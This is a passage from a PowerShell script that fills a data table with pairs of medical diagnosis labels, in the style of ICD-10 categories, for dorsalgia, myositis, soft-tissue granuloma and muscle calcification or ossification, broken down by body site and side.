in thoracic spine","Pain in thoracic spine") + $null = $DiagnosisList.Rows.Add("Other dorsalgia","Occipital neuralgia") + $null = $DiagnosisList.Rows.Add("Other dorsalgia","Other dorsalgia") + $null = $DiagnosisList.Rows.Add("Dorsalgia, unspecified","Dorsalgia, unspecified") + $null = $DiagnosisList.Rows.Add("Infective myositis, unspecified site","Infective myositis, unspecified right arm") + $null = $DiagnosisList.Rows.Add("Infective myositis, unspecified site","Infective myositis, unspecified left arm") + $null = $DiagnosisList.Rows.Add("Infective myositis, unspecified site","Infective myositis, unspecified arm") + $null = $DiagnosisList.Rows.Add("Infective myositis, unspecified site","Infective myositis, unspecified right leg") + $null = $DiagnosisList.Rows.Add("Infective myositis, unspecified site","Infective myositis, unspecified left leg") + $null = $DiagnosisList.Rows.Add("Infective myositis, unspecified site","Infective myositis, unspecified leg") + $null = $DiagnosisList.Rows.Add("Infective myositis, unspecified site","Infective myositis, unspecified site") + $null = $DiagnosisList.Rows.Add("Infective myositis, shoulder","Infective myositis, right shoulder") + $null = $DiagnosisList.Rows.Add("Infective myositis, shoulder","Infective myositis, left shoulder") + $null = $DiagnosisList.Rows.Add("Infective myositis, shoulder","Infective myositis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Infective myositis, upper arm","Infective myositis, right upper arm") + $null = $DiagnosisList.Rows.Add("Infective myositis, upper arm","Infective myositis, left upper arm") + $null = $DiagnosisList.Rows.Add("Infective myositis, upper arm","Infective myositis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Infective myositis, forearm","Infective myositis, right forearm") + $null = $DiagnosisList.Rows.Add("Infective myositis, forearm","Infective myositis, left forearm") + $null = $DiagnosisList.Rows.Add("Infective myositis, forearm","Infective myositis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Infective myositis, hand and fingers","Infective myositis, right hand") + $null = $DiagnosisList.Rows.Add("Infective myositis, hand and fingers","Infective myositis, left hand") + $null = $DiagnosisList.Rows.Add("Infective myositis, hand and fingers","Infective myositis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Infective myositis, hand and fingers","Infective myositis, right finger(s)") + $null = $DiagnosisList.Rows.Add("Infective myositis, hand and fingers","Infective myositis, left finger(s)") + $null = $DiagnosisList.Rows.Add("Infective myositis, hand and fingers","Infective myositis, unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Infective myositis, thigh","Infective myositis, right thigh") + $null = $DiagnosisList.Rows.Add("Infective myositis, thigh","Infective myositis, left thigh") + $null = $DiagnosisList.Rows.Add("Infective myositis, thigh","Infective myositis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Infective myositis, lower leg","Infective myositis, right lower leg") + $null = $DiagnosisList.Rows.Add("Infective myositis, lower leg","Infective myositis, left lower leg") + $null = $DiagnosisList.Rows.Add("Infective myositis, lower leg","Infective myositis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, right ankle") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, left ankle") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, right foot") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, left foot") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, unspecified foot") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, right toe(s)") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, left toe(s)") + $null = $DiagnosisList.Rows.Add("Infective myositis, ankle, foot and toes","Infective myositis, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Infective myositis, other site","Infective myositis, other site") + $null = $DiagnosisList.Rows.Add("Infective myositis, multiple sites","Infective myositis, multiple sites") + $null = $DiagnosisList.Rows.Add("Interstitial myositis","Interstitial myositis of unspecified site") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, shoulder","Interstitial myositis, right shoulder") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, shoulder","Interstitial myositis, left shoulder") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, shoulder","Interstitial myositis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, upper arm","Interstitial myositis, right upper arm") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, upper arm","Interstitial myositis, left upper arm") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, upper arm","Interstitial myositis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, forearm","Interstitial myositis, right forearm") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, forearm","Interstitial myositis, left forearm") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, forearm","Interstitial myositis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, hand","Interstitial myositis, right hand") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, hand","Interstitial myositis, left hand") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, hand","Interstitial myositis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, thigh","Interstitial myositis, right thigh") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, thigh","Interstitial myositis, left thigh") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, thigh","Interstitial myositis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, lower leg","Interstitial myositis, right lower leg") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, lower leg","Interstitial myositis, left lower leg") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, lower leg","Interstitial myositis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, ankle and foot","Interstitial myositis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, ankle and foot","Interstitial myositis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, ankle and foot","Interstitial myositis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, other site","Interstitial myositis, other site") + $null = $DiagnosisList.Rows.Add("Interstitial myositis, multiple sites","Interstitial myositis, multiple sites") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, shoulder","Foreign body granuloma of soft tissue, not elsewhere classified, right shoulder") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, shoulder","Foreign body granuloma of soft tissue, not elsewhere classified, left shoulder") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, shoulder","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, upper arm","Foreign body granuloma of soft tissue, not elsewhere classified, right upper arm") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, upper arm","Foreign body granuloma of soft tissue, not elsewhere classified, left upper arm") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, upper arm","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, forearm","Foreign body granuloma of soft tissue, not elsewhere classified, right forearm") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, forearm","Foreign body granuloma of soft tissue, not elsewhere classified, left forearm") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, forearm","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, hand","Foreign body granuloma of soft tissue, not elsewhere classified, right hand") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, hand","Foreign body granuloma of soft tissue, not elsewhere classified, left hand") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, hand","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, thigh","Foreign body granuloma of soft tissue, not elsewhere classified, right thigh") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, thigh","Foreign body granuloma of soft tissue, not elsewhere classified, left thigh") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, thigh","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, lower leg","Foreign body granuloma of soft tissue, not elsewhere classified, right lower leg") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, lower leg","Foreign body granuloma of soft tissue, not elsewhere classified, left lower leg") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, lower leg","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, ankle and foot","Foreign body granuloma of soft tissue, not elsewhere classified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, ankle and foot","Foreign body granuloma of soft tissue, not elsewhere classified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, ankle and foot","Foreign body granuloma of soft tissue, not elsewhere classified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Foreign body granuloma of soft tissue, not elsewhere classified, other site","Foreign body granuloma of soft tissue, not elsewhere classified, other site") + $null = $DiagnosisList.Rows.Add("Other myositis","Other myositis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other myositis shoulder","Other myositis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other myositis shoulder","Other myositis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other myositis shoulder","Other myositis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other myositis, upper arm","Other myositis, right upper arm") + $null = $DiagnosisList.Rows.Add("Other myositis, upper arm","Other myositis, left upper arm") + $null = $DiagnosisList.Rows.Add("Other myositis, upper arm","Other myositis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other myositis, forearm","Other myositis, right forearm") + $null = $DiagnosisList.Rows.Add("Other myositis, forearm","Other myositis, left forearm") + $null = $DiagnosisList.Rows.Add("Other myositis, forearm","Other myositis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other myositis, hand","Other myositis, right hand") + $null = $DiagnosisList.Rows.Add("Other myositis, hand","Other myositis, left hand") + $null = $DiagnosisList.Rows.Add("Other myositis, hand","Other myositis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other myositis, thigh","Other myositis, right thigh") + $null = $DiagnosisList.Rows.Add("Other myositis, thigh","Other myositis, left thigh") + $null = $DiagnosisList.Rows.Add("Other myositis, thigh","Other myositis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other myositis, lower leg","Other myositis, right lower leg") + $null = $DiagnosisList.Rows.Add("Other myositis, lower leg","Other myositis, left lower leg") + $null = $DiagnosisList.Rows.Add("Other myositis, lower leg","Other myositis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other myositis, ankle and foot","Other myositis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other myositis, ankle and foot","Other myositis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other myositis, ankle and foot","Other myositis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other myositis, other site","Other myositis, other site") + $null = $DiagnosisList.Rows.Add("Other myositis, multiple sites","Other myositis, multiple sites") + $null = $DiagnosisList.Rows.Add("Myositis, unspecified","Myositis, unspecified") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica","Myositis ossificans traumatica, unspecified site") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, shoulder","Myositis ossificans traumatica, right shoulder") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, shoulder","Myositis ossificans traumatica, left shoulder") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, shoulder","Myositis ossificans traumatica, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, upper arm","Myositis ossificans traumatica, right upper arm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, upper arm","Myositis ossificans traumatica, left upper arm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, upper arm","Myositis ossificans traumatica, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, forearm","Myositis ossificans traumatica, right forearm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, forearm","Myositis ossificans traumatica, left forearm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, forearm","Myositis ossificans traumatica, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, hand","Myositis ossificans traumatica, right hand") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, hand","Myositis ossificans traumatica, left hand") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, hand","Myositis ossificans traumatica, unspecified hand") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, thigh","Myositis ossificans traumatica, right thigh") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, thigh","Myositis ossificans traumatica, left thigh") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, thigh","Myositis ossificans traumatica, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, lower leg","Myositis ossificans traumatica, right lower leg") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, lower leg","Myositis ossificans traumatica, left lower leg") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, lower leg","Myositis ossificans traumatica, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, ankle and foot","Myositis ossificans traumatica, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, ankle and foot","Myositis ossificans traumatica, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, ankle and foot","Myositis ossificans traumatica, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, other site","Myositis ossificans traumatica, other site") + $null = $DiagnosisList.Rows.Add("Myositis ossificans traumatica, multiple sites","Myositis ossificans traumatica, multiple sites") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva","Myositis ossificans progressiva, unspecified site") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, shoulder","Myositis ossificans progressiva, right shoulder") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, shoulder","Myositis ossificans progressiva, left shoulder") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, shoulder","Myositis ossificans progressiva, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, upper arm","Myositis ossificans progressiva, right upper arm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, upper arm","Myositis ossificans progressiva, left upper arm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, upper arm","Myositis ossificans progressiva, unspecified arm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, forearm","Myositis ossificans progressiva, right forearm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, forearm","Myositis ossificans progressiva, left forearm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, forearm","Myositis ossificans progressiva, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, hand and finger(s)","Myositis ossificans progressiva, right hand") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, hand and finger(s)","Myositis ossificans progressiva, left hand") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, hand and finger(s)","Myositis ossificans progressiva, unspecified hand") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, hand and finger(s)","Myositis ossificans progressiva, right finger(s)") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, hand and finger(s)","Myositis ossificans progressiva, left finger(s)") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, hand and finger(s)","Myositis ossificans progressiva, unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, thigh","Myositis ossificans progressiva, right thigh") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, thigh","Myositis ossificans progressiva, left thigh") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, thigh","Myositis ossificans progressiva, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, lower leg","Myositis ossificans progressiva, right lower leg") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, lower leg","Myositis ossificans progressiva, left lower leg") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, lower leg","Myositis ossificans progressiva, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, right ankle") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, left ankle") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, right foot") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, left foot") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, unspecified foot") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, right toe(s)") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, left toe(s)") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, ankle, foot and toe(s)","Myositis ossificans progressiva, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, other site","Myositis ossificans progressiva, other site") + $null = $DiagnosisList.Rows.Add("Myositis ossificans progressiva, multiple sites","Myositis ossificans progressiva, multiple sites") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle","Paralytic calcification and ossification of muscle, unspecified site") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, shoulder","Paralytic calcification and ossification of muscle, right shoulder") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, shoulder","Paralytic calcification and ossification of muscle, left shoulder") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, shoulder","Paralytic calcification and ossification of muscle, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, upper arm","Paralytic calcification and ossification of muscle, right upper arm") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, upper arm","Paralytic calcification and ossification of muscle, left upper arm") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, upper arm","Paralytic calcification and ossification of muscle, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, forearm","Paralytic calcification and ossification of muscle, right forearm") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, forearm","Paralytic calcification and ossification of muscle, left forearm") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, forearm","Paralytic calcification and ossification of muscle, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, hand","Paralytic calcification and ossification of muscle, right hand") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, hand","Paralytic calcification and ossification of muscle, left hand") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, hand","Paralytic calcification and ossification of muscle, unspecified hand") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, thigh","Paralytic calcification and ossification of muscle, right thigh") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, thigh","Paralytic calcification and ossification of muscle, left thigh") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, thigh","Paralytic calcification and ossification of muscle, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, lower leg","Paralytic calcification and ossification of muscle, right lower leg") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, lower leg","Paralytic calcification and ossification of muscle, left lower leg") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, lower leg","Paralytic calcification and ossification of muscle, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, ankle and foot","Paralytic calcification and ossification of muscle, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, ankle and foot","Paralytic calcification and ossification of muscle, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, ankle and foot","Paralytic calcification and ossification of muscle, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, other site","Paralytic calcification and ossification of muscle, other site") + $null = $DiagnosisList.Rows.Add("Paralytic calcification and ossification of muscle, multiple sites","Paralytic calcification and ossification of muscle, multiple sites") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns","Calcification and ossification of muscles associated with burns, unspecified site") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, shoulder","Calcification and ossification of muscles associated with burns, right shoulder") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, shoulder","Calcification and ossification of muscles associated with burns, left shoulder") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, shoulder","Calcification and ossification of muscles associated with burns, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, upper arm","Calcification and ossification of muscles associated with burns, right upper arm") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, upper arm","Calcification and ossification of muscles associated with burns, left upper arm") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, upper arm","Calcification and ossification of muscles associated with burns, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, forearm","Calcification and ossification of muscles associated with burns, right forearm") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, forearm","Calcification and ossification of muscles associated with burns, left forearm") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, forearm","Calcification and ossification of muscles associated with burns, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, hand","Calcification and ossification of muscles associated with burns, right hand") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, hand","Calcification and ossification of muscles associated with burns, left hand") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, hand","Calcification and ossification of muscles associated with burns, unspecified hand") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, thigh","Calcification and ossification of muscles associated with burns, right thigh") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, thigh","Calcification and ossification of muscles associated with burns, left thigh") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, thigh","Calcification and ossification of muscles associated with burns, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, lower leg","Calcification and ossification of muscles associated with burns, right lower leg") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, lower leg","Calcification and ossification of muscles associated with burns, left lower leg") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, lower leg","Calcification and ossification of muscles associated with burns, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, ankle and foot","Calcification and ossification of muscles associated with burns, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, ankle and foot","Calcification and ossification of muscles associated with burns, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, ankle and foot","Calcification and ossification of muscles associated with burns, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, other site","Calcification and ossification of muscles associated with burns, other site") + $null = $DiagnosisList.Rows.Add("Calcification and ossification of muscles associated with burns, multiple sites","Calcification and ossification of muscles associated with burns, multiple sites") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle","Other calcification of muscle, unspecified site") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, shoulder","Other calcification of muscle, right shoulder") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, shoulder","Other calcification of muscle, left shoulder") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, shoulder","Other calcification of muscle, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, upper arm","Other calcification of muscle, right upper arm") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, upper arm","Other calcification of muscle, left upper arm") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, upper arm","Other calcification of muscle, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, forearm","Other calcification of muscle, right forearm") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, forearm","Other calcification of muscle, left forearm") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, forearm","Other calcification of muscle, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, hand","Other calcification of muscle, right hand") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, hand","Other calcification of muscle, left hand") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, hand","Other calcification of muscle, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, thigh","Other calcification of muscle, right thigh") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, thigh","Other calcification of muscle, left thigh") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, thigh","Other calcification of muscle, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, lower leg","Other calcification of muscle, right lower leg") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, lower leg","Other calcification of muscle, left lower leg") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, lower leg","Other calcification of muscle, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, ankle and foot","Other calcification of muscle, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, ankle and foot","Other calcification of muscle, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, ankle and foot","Other calcification of muscle, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, other site","Other calcification of muscle, other site") + $null = $DiagnosisList.Rows.Add("Other calcification of muscle, multiple sites","Other calcification of muscle, multiple sites") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle","Other ossification of muscle, unspecified site") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, shoulder","Other ossification of muscle, right shoulder") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, shoulder","Other ossification of muscle, left shoulder") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, shoulder","Other ossification of muscle, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, upper arm","Other ossification of muscle, right upper arm") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, upper arm","Other ossification of muscle, left upper arm") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, upper arm","Other ossification of muscle, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, forearm","Other ossification of muscle, right forearm") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, forearm","Other ossification of muscle, left forearm") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, forearm","Other ossification of muscle, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, hand","Other ossification of muscle, right hand") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, hand","Other ossification of muscle, left hand") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, hand","Other ossification of muscle, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, thigh","Other ossification of muscle, right thigh") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, thigh","Other ossification of muscle, left thigh") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, thigh","Other ossification of muscle, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, lower leg","Other ossification of muscle, right lower leg") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, lower leg","Other ossification of muscle, left lower leg") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, lower leg","Other ossification of muscle, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, ankle and foot","Other ossification of muscle, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, ankle and foot","Other ossification of muscle, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, ankle and foot","Other ossification of muscle, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other ossification of muscle, other site","Other ossification of muscle, other site") + $null = 